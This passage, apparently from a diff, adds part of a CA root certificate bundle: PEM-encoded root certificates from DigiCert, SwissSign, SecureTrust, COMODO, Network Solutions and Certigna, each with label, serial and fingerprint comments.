+MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j +ZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL +MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 +LmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug +RVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm ++9S75S0tMqbf5YE/yc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW +PNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG++MXs2ziS4wblCJEM +xChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB +Ik5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx+mM0aBhakaHPQNAQTXKFx01p8VdteZOE3 +hzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg +EsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQF 
+MAMBAf8wHQYDVR0OBBYEFLE+w2kD+L9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA +FLE+w2kD+L9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec +nzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe/EW1ntlMMUu4kehDLI6z +eM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF +hS9OMPagMRYjyOfiZRYzy78aG6A9+MpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2 +Yzi9RKR/5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2/S6cCZdkGCe +vEsXCS+0yx5DaMkHJ8HSXPfqIbloEpw8nL+e/IBcm2PN7EeqJSdnoDfzAIJ9VNep ++OkuE6N36B9K +-----END CERTIFICATE----- + +# Issuer: CN=SwissSign Gold CA - G2 O=SwissSign AG +# Subject: CN=SwissSign Gold CA - G2 O=SwissSign AG +# Label: "SwissSign Gold CA - G2" +# Serial: 13492815561806991280 +# MD5 Fingerprint: 24:77:d9:a8:91:d1:3b:fa:88:2d:c2:ff:f8:cd:33:93 +# SHA1 Fingerprint: d8:c5:38:8a:b7:30:1b:1b:6e:d4:7a:e6:45:25:3a:6f:9f:1a:27:61 +# SHA256 Fingerprint: 62:dd:0b:e9:b9:f5:0a:16:3e:a0:f8:e7:5c:05:3b:1e:ca:57:ea:55:c8:68:8f:64:7c:68:81:f2:c8:35:7b:95 +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Issuer: CN=SwissSign Silver CA - G2 O=SwissSign AG +# Subject: CN=SwissSign Silver CA - G2 O=SwissSign AG +# Label: "SwissSign Silver CA - G2" +# Serial: 5700383053117599563 +# MD5 Fingerprint: e0:06:a1:c9:7d:cf:c9:fc:0d:c0:56:75:96:d8:62:13 +# SHA1 Fingerprint: 9b:aa:e5:9f:56:ee:21:cb:43:5a:be:25:93:df:a7:f0:40:d1:1d:cb +# SHA256 Fingerprint: be:6c:4d:a2:bb:b9:ba:59:b6:f3:93:97:68:37:42:46:c3:c0:05:99:3f:a9:8f:02:0d:1d:ed:be:d4:8a:81:d5 +-----BEGIN CERTIFICATE----- 
+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 +-----END CERTIFICATE----- + +# Issuer: CN=SecureTrust CA O=SecureTrust Corporation +# Subject: CN=SecureTrust CA O=SecureTrust Corporation +# Label: "SecureTrust CA" +# Serial: 17199774589125277788362757014266862032 +# MD5 Fingerprint: dc:32:c3:a7:6d:25:57:c7:68:09:9d:ea:2d:a9:a2:d1 +# SHA1 Fingerprint: 87:82:c6:c3:04:35:3b:cf:d2:96:92:d2:59:3e:7d:44:d9:34:ff:11 +# SHA256 Fingerprint: f1:c1:b5:0a:e5:a2:0d:d8:03:0e:c9:f6:bc:24:82:3d:d3:67:b5:25:57:59:b4:e7:1b:61:fc:e9:f7:37:5d:73 +-----BEGIN CERTIFICATE----- +MIIDuDCCAqCgAwIBAgIQDPCOXAgWpa1Cf/DrJxhZ0DANBgkqhkiG9w0BAQUFADBI +MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3QgQ29ycG9yYXRpb24x +FzAVBgNVBAMTDlNlY3VyZVRydXN0IENBMB4XDTA2MTEwNzE5MzExOFoXDTI5MTIz +MTE5NDA1NVowSDELMAkGA1UEBhMCVVMxIDAeBgNVBAoTF1NlY3VyZVRydXN0IENv +cnBvcmF0aW9uMRcwFQYDVQQDEw5TZWN1cmVUcnVzdCBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAKukgeWVzfX2FI7CT8rU4niVWJxB4Q2ZQCQXOZEz +Zum+4YOvYlyJ0fwkW2Gz4BERQRwdbvC4u/jep4G6pkjGnx29vo6pQT64lO0pGtSO +0gMdA+9tDWccV9cGrcrI9f4Or2YlSASWC12juhbDCE/RRvgUXPLIXgGZbf2IzIao +wW8xQmxSPmjL8xk037uHGFaAJsTQ3MBv396gwpEWoGQRS0S8Hvbn+mPeZqx2pHGj +7DaUaHp3pLHnDi+BeuK1cobvomuL8A/b01k/unK8RCSc43Oz969XL0Imnal0ugBS +8kvNU3xHCzaFDmapCJcWNFfBZveA4+1wVMeT4C4oFVmHursCAwEAAaOBnTCBmjAT +BgkrBgEEAYI3FAIEBh4EAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB +/zAdBgNVHQ4EFgQUQjK2FvoE/f5dS3rD/fdMQB1aQ68wNAYDVR0fBC0wKzApoCeg +JYYjaHR0cDovL2NybC5zZWN1cmV0cnVzdC5jb20vU1RDQS5jcmwwEAYJKwYBBAGC +NxUBBAMCAQAwDQYJKoZIhvcNAQEFBQADggEBADDtT0rhWDpSclu1pqNlGKa7UTt3 
+6Z3q059c4EVlew3KW+JwULKUBRSuSceNQQcSc5R+DCMh/bwQf2AQWnL1mA6s7Ll/ +3XpvXdMc9P+IBWlCqQVxyLesJugutIxq/3HcuLHfmbx8IVQr5Fiiu1cprp6poxkm +D5kuCLDv/WnPmRoJjeOnnyvJNjR7JLN4TJUXpAYmHrZkUjZfYGfZnMUFdAvnZyPS +CPyI6a6Lf+Ew9Dd+/cYy2i2eRDAwbO4H3tI0/NL/QPZL9GZGBlSm8jIKYyYwa5vR +3ItHuuG51WLQoqD0ZwV4KWMabwTW+MZMo5qxN7SN5ShLHZ4swrhovO0C7jE= +-----END CERTIFICATE----- + +# Issuer: CN=Secure Global CA O=SecureTrust Corporation +# Subject: CN=Secure Global CA O=SecureTrust Corporation +# Label: "Secure Global CA" +# Serial: 9751836167731051554232119481456978597 +# MD5 Fingerprint: cf:f4:27:0d:d4:ed:dc:65:16:49:6d:3d:da:bf:6e:de +# SHA1 Fingerprint: 3a:44:73:5a:e5:81:90:1f:24:86:61:46:1e:3b:9c:c4:5f:f5:3a:1b +# SHA256 Fingerprint: 42:00:f5:04:3a:c8:59:0e:bb:52:7d:20:9e:d1:50:30:29:fb:cb:d4:1c:a1:b5:06:ec:27:f1:5a:de:7d:ac:69 +-----BEGIN CERTIFICATE----- +MIIDvDCCAqSgAwIBAgIQB1YipOjUiolN9BPI8PjqpTANBgkqhkiG9w0BAQUFADBK +MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3QgQ29ycG9yYXRpb24x +GTAXBgNVBAMTEFNlY3VyZSBHbG9iYWwgQ0EwHhcNMDYxMTA3MTk0MjI4WhcNMjkx +MjMxMTk1MjA2WjBKMQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3Qg +Q29ycG9yYXRpb24xGTAXBgNVBAMTEFNlY3VyZSBHbG9iYWwgQ0EwggEiMA0GCSqG +SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCvNS7YrGxVaQZx5RNoJLNP2MwhR/jxYDiJ +iQPpvepeRlMJ3Fz1Wuj3RSoC6zFh1ykzTM7HfAo3fg+6MpjhHZevj8fcyTiW89sa +/FHtaMbQbqR8JNGuQsiWUGMu4P51/pinX0kuleM5M2SOHqRfkNJnPLLZ/kG5VacJ +jnIFHovdRIWCQtBJwB1g8NEXLJXr9qXBkqPFwqcIYA1gBBCWeZ4WNOaptvolRTnI +HmX5k/Wq8VLcmZg9pYYaDDUz+kulBAYVHDGA76oYa8J719rO+TMg1fW9ajMtgQT7 +sFzUnKPiXB3jqUJ1XnvUd+85VLrJChgbEplJL4hL/VBi0XPnj3pDAgMBAAGjgZ0w +gZowEwYJKwYBBAGCNxQCBAYeBABDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQF +MAMBAf8wHQYDVR0OBBYEFK9EBMJBfkiD2045AuzshHrmzsmkMDQGA1UdHwQtMCsw +KaAnoCWGI2h0dHA6Ly9jcmwuc2VjdXJldHJ1c3QuY29tL1NHQ0EuY3JsMBAGCSsG +AQQBgjcVAQQDAgEAMA0GCSqGSIb3DQEBBQUAA4IBAQBjGghAfaReUw132HquHw0L +URYD7xh8yOOvaliTFGCRsoTciE6+OYo68+aCiV0BN7OrJKQVDpI1WkpEXk5X+nXO +H0jOZvQ8QCaSmGwb7iRGDBezUqXbpZGRzzfTb+cnCDpOGR86p1hcF895P4vkp9Mm +I50mD1hp/Ed+stCNi5O/KU9DaXR2Z0vPB4zmAve14bRDtUstFJ/53CYNv6ZHdAbY +iNE6KTCEztI5gGIbqMdXSbxqVVFnFUq+NQfk1XWYN3kwFNspnWzFacxHVaIw98xc +f8LDmBxrThaA63p4ZUWiABqvDA1VZDRIuJK58bRQKfJPIx/abKwfROHdI3hRW8cW +-----END CERTIFICATE----- + +# Issuer: CN=COMODO Certification Authority O=COMODO CA Limited +# Subject: CN=COMODO Certification Authority O=COMODO CA Limited +# Label: "COMODO Certification Authority" +# Serial: 104350513648249232941998508985834464573 +# MD5 Fingerprint: 5c:48:dc:f7:42:72:ec:56:94:6d:1c:cc:71:35:80:75 +# SHA1 Fingerprint: 66:31:bf:9e:f7:4f:9e:b6:c9:d5:a6:0c:ba:6a:be:d1:f7:bd:ef:7b +# SHA256 Fingerprint: 0c:2c:d6:3d:f7:80:6f:a3:99:ed:e8:09:11:6b:57:5b:f8:79:89:f0:65:18:f9:80:8c:86:05:03:17:8b:af:66 +-----BEGIN CERTIFICATE----- +MIIEHTCCAwWgAwIBAgIQToEtioJl4AsC7j41AkblPTANBgkqhkiG9w0BAQUFADCB +gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G +A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV +BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0wNjEyMDEwMDAw +MDBaFw0yOTEyMzEyMzU5NTlaMIGBMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl +YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P +RE8gQ0EgTGltaXRlZDEnMCUGA1UEAxMeQ09NT0RPIENlcnRpZmljYXRpb24gQXV0 +aG9yaXR5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0ECLi3LjkRv3 +UcEbVASY06m/weaKXTuH+7uIzg3jLz8GlvCiKVCZrts7oVewdFFxze1CkU1B/qnI +2GqGd0S7WWaXUF601CxwRM/aN5VCaTwwxHGzUvAhTaHYujl8HJ6jJJ3ygxaYqhZ8 +Q5sVW7euNJH+1GImGEaaP+vB+fGQV+useg2L23IwambV4EajcNxo2f8ESIl33rXp ++2dtQem8Ob0y2WIC8bGoPW43nOIv4tOiJovGuFVDiOEjPqXSJDlqR6sA1KGzqSX+ 
+DT+nHbrTUcELpNqsOO9VUCQFZUaTNE8tja3G1CEZ0o7KBWFxB3NH5YoZEr0ETc5O +nKVIrLsm9wIDAQABo4GOMIGLMB0GA1UdDgQWBBQLWOWLxkwVN6RAqTCpIb5HNlpW +/zAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zBJBgNVHR8EQjBAMD6g +PKA6hjhodHRwOi8vY3JsLmNvbW9kb2NhLmNvbS9DT01PRE9DZXJ0aWZpY2F0aW9u +QXV0aG9yaXR5LmNybDANBgkqhkiG9w0BAQUFAAOCAQEAPpiem/Yb6dc5t3iuHXIY +SdOH5EOC6z/JqvWote9VfCFSZfnVDeFs9D6Mk3ORLgLETgdxb8CPOGEIqB6BCsAv +IC9Bi5HcSEW88cbeunZrM8gALTFGTO3nnc+IlP8zwFboJIYmuNg4ON8qa90SzMc/ +RxdMosIGlgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4 +zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd +BA6+C4OmF4O5MBKgxTMVBbkN+8cFduPYSo38NBejxiEovjBFMR7HeL5YYTisO+IB +ZQ== +-----END CERTIFICATE----- + +# Issuer: CN=Network Solutions Certificate Authority O=Network Solutions L.L.C. +# Subject: CN=Network Solutions Certificate Authority O=Network Solutions L.L.C. +# Label: "Network Solutions Certificate Authority" +# Serial: 116697915152937497490437556386812487904 +# MD5 Fingerprint: d3:f3:a6:16:c0:fa:6b:1d:59:b1:2d:96:4d:0e:11:2e +# SHA1 Fingerprint: 74:f8:a3:c3:ef:e7:b3:90:06:4b:83:90:3c:21:64:60:20:e5:df:ce +# SHA256 Fingerprint: 15:f0:ba:00:a3:ac:7a:f3:ac:88:4c:07:2b:10:11:a0:77:bd:77:c0:97:f4:01:64:b2:f8:59:8a:bd:83:86:0c +-----BEGIN CERTIFICATE----- +MIID5jCCAs6gAwIBAgIQV8szb8JcFuZHFhfjkDFo4DANBgkqhkiG9w0BAQUFADBi +MQswCQYDVQQGEwJVUzEhMB8GA1UEChMYTmV0d29yayBTb2x1dGlvbnMgTC5MLkMu +MTAwLgYDVQQDEydOZXR3b3JrIFNvbHV0aW9ucyBDZXJ0aWZpY2F0ZSBBdXRob3Jp +dHkwHhcNMDYxMjAxMDAwMDAwWhcNMjkxMjMxMjM1OTU5WjBiMQswCQYDVQQGEwJV +UzEhMB8GA1UEChMYTmV0d29yayBTb2x1dGlvbnMgTC5MLkMuMTAwLgYDVQQDEydO +ZXR3b3JrIFNvbHV0aW9ucyBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwggEiMA0GCSqG +SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDkvH6SMG3G2I4rC7xGzuAnlt7e+foS0zwz +c7MEL7xxjOWftiJgPl9dzgn/ggwbmlFQGiaJ3dVhXRncEg8tCqJDXRfQNJIg6nPP +OCwGJgl6cvf6UDL4wpPTaaIjzkGxzOTVHzbRijr4jGPiFFlp7Q3Tf2vouAPlT2rl +mGNpSAW+Lv8ztumXWWn4Zxmuk2GWRBXTcrA/vGp97Eh/jcOrqnErU2lBUzS1sLnF +BgrEsEX1QV1uiUV7PTsmjHTC5dLRfbIR1PtYMiKagMnc/Qzpf14Dl847ABSHJ3A4 +qY5usyd2mFHgBeMhqxrVhSI8KbWaFsWAqPS7azCPL0YCorEMIuDTAgMBAAGjgZcw +gZQwHQYDVR0OBBYEFCEwyfsA106Y2oeqKtCnLrFAMadMMA4GA1UdDwEB/wQEAwIB +BjAPBgNVHRMBAf8EBTADAQH/MFIGA1UdHwRLMEkwR6BFoEOGQWh0dHA6Ly9jcmwu +bmV0c29sc3NsLmNvbS9OZXR3b3JrU29sdXRpb25zQ2VydGlmaWNhdGVBdXRob3Jp +dHkuY3JsMA0GCSqGSIb3DQEBBQUAA4IBAQC7rkvnt1frf6ott3NHhWrB5KUd5Oc8 +6fRZZXe1eltajSU24HqXLjjAV2CDmAaDn7l2em5Q4LqILPxFzBiwmZVRDuwduIj/ +h1AcgsLj4DKAv6ALR8jDMe+ZZzKATxcheQxpXN5eNK4CtSbqUN9/GGUsyfJj4akH +/nxxH2szJGoeBfcFaMBqEssuXmHLrijTfsK0ZpEmXzwuJF/LWA/rKOyvEZbz3Htv +wKeI8lN3s2Berq4o2jUsbzRF0ybh3uxbTydrFny9RAQYgrOJeRcQcT16ohZO9QHN +pGxlaKFJdlxDydi8NmdspZS11My5vWo1ViHe2MPr+8ukYEywVaCge1ey +-----END CERTIFICATE----- + +# Issuer: CN=COMODO ECC Certification Authority O=COMODO CA Limited +# Subject: CN=COMODO ECC Certification Authority O=COMODO CA Limited +# Label: "COMODO ECC Certification Authority" +# Serial: 41578283867086692638256921589707938090 +# MD5 Fingerprint: 7c:62:ff:74:9d:31:53:5e:68:4a:d5:78:aa:1e:bf:23 +# SHA1 Fingerprint: 9f:74:4e:9f:2b:4d:ba:ec:0f:31:2c:50:b6:56:3b:8e:2d:93:c3:11 +# SHA256 Fingerprint: 17:93:92:7a:06:14:54:97:89:ad:ce:2f:8f:34:f7:f0:b6:6d:0f:3a:e3:a3:b8:4d:21:ec:15:db:ba:4f:ad:c7 +-----BEGIN CERTIFICATE----- +MIICiTCCAg+gAwIBAgIQH0evqmIAcFBUTAGem2OZKjAKBggqhkjOPQQDAzCBhTEL +MAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UE +BxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxKzApBgNVBAMT +IkNPTU9ETyBFQ0MgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDgwMzA2MDAw +MDAwWhcNMzgwMTE4MjM1OTU5WjCBhTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdy 
+ZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09N +T0RPIENBIExpbWl0ZWQxKzApBgNVBAMTIkNPTU9ETyBFQ0MgQ2VydGlmaWNhdGlv +biBBdXRob3JpdHkwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQDR3svdcmCFYX7deSR +FtSrYpn1PlILBs5BAH+X4QokPB0BBO490o0JlwzgdeT6+3eKKvUDYEs2ixYjFq0J +cfRK9ChQtP6IHG4/bC8vCVlbpVsLM5niwz2J+Wos77LTBumjQjBAMB0GA1UdDgQW +BBR1cacZSBm8nZ3qQUfflMRId5nTeTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/ +BAUwAwEB/zAKBggqhkjOPQQDAwNoADBlAjEA7wNbeqy3eApyt4jf/7VGFAkK+qDm +fQjGGoe9GKhzvSbKYAydzpmfz1wPMOG+FDHqAjAU9JM8SaczepBGR7NjfRObTrdv +GDeAU/7dIOA1mjbRxwG55tzd8/8dLDoWV9mSOdY= +-----END CERTIFICATE----- + +# Issuer: CN=Certigna O=Dhimyotis +# Subject: CN=Certigna O=Dhimyotis +# Label: "Certigna" +# Serial: 18364802974209362175 +# MD5 Fingerprint: ab:57:a6:5b:7d:42:82:19:b5:d8:58:26:28:5e:fd:ff +# SHA1 Fingerprint: b1:2e:13:63:45:86:a4:6f:1a:b2:60:68:37:58:2d:c4:ac:fd:94:97 +# SHA256 Fingerprint: e3:b6:a2:db:2e:d7:ce:48:84:2f:7a:c5:32:41:c7:b7:1d:54:14:4b:fb:40:c1:1f:3f:1d:0b:42:f5:ee:a1:2d +-----BEGIN CERTIFICATE----- +MIIDqDCCApCgAwIBAgIJAP7c4wEPyUj/MA0GCSqGSIb3DQEBBQUAMDQxCzAJBgNV +BAYTAkZSMRIwEAYDVQQKDAlEaGlteW90aXMxETAPBgNVBAMMCENlcnRpZ25hMB4X +DTA3MDYyOTE1MTMwNVoXDTI3MDYyOTE1MTMwNVowNDELMAkGA1UEBhMCRlIxEjAQ +BgNVBAoMCURoaW15b3RpczERMA8GA1UEAwwIQ2VydGlnbmEwggEiMA0GCSqGSIb3 +DQEBAQUAA4IBDwAwggEKAoIBAQDIaPHJ1tazNHUmgh7stL7qXOEm7RFHYeGifBZ4 +QCHkYJ5ayGPhxLGWkv8YbWkj4Sti993iNi+RB7lIzw7sebYs5zRLcAglozyHGxny +gQcPOJAZ0xH+hrTy0V4eHpbNgGzOOzGTtvKg0KmVEn2lmsxryIRWijOp5yIVUxbw +zBfsV1/pogqYCd7jX5xv3EjjhQsVWqa6n6xI4wmy9/Qy3l40vhx4XUJbzg4ij02Q +130yGLMLLGq/jj8UEYkgDncUtT2UCIf3JR7VsmAA7G8qKCVuKj4YYxclPz5EIBb2 +JsglrgVKtOdjLPOMFlN+XPsRGgjBRmKfIrjxwo1p3Po6WAbfAgMBAAGjgbwwgbkw +DwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUGu3+QTmQtCRZvgHyUtVF9lo53BEw +ZAYDVR0jBF0wW4AUGu3+QTmQtCRZvgHyUtVF9lo53BGhOKQ2MDQxCzAJBgNVBAYT +AkZSMRIwEAYDVQQKDAlEaGlteW90aXMxETAPBgNVBAMMCENlcnRpZ25hggkA/tzj +AQ/JSP8wDgYDVR0PAQH/BAQDAgEGMBEGCWCGSAGG+EIBAQQEAwIABzANBgkqhkiG +9w0BAQUFAAOCAQEAhQMeknH2Qq/ho2Ge6/PAD/Kl1NqV5ta+aDY9fm4fTIrv0Q8h +bV6lUmPOEvjvKtpv6zf+EwLHyzs+ImvaYS5/1HI93TDhHkxAGYwP15zRgzB7mFnc 